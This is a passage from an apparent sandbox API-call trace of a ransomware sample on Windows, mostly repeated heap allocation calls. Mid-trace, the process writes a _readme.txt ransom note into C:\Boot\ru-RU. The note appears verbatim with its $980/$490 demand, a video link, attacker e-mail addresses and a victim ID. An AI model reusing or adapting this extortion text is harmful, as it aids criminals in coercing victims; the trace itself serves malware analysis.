0x37a2b08 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.644] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0227.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.644] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.644] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.644] PathFindFileNameW (pszPath="") returned="" [0227.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.645] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.645] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.645] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.646] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.646] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0227.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.646] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0227.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.647] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.647] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.648] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.648] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.648] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.648] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.648] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.649] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.649] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.653] 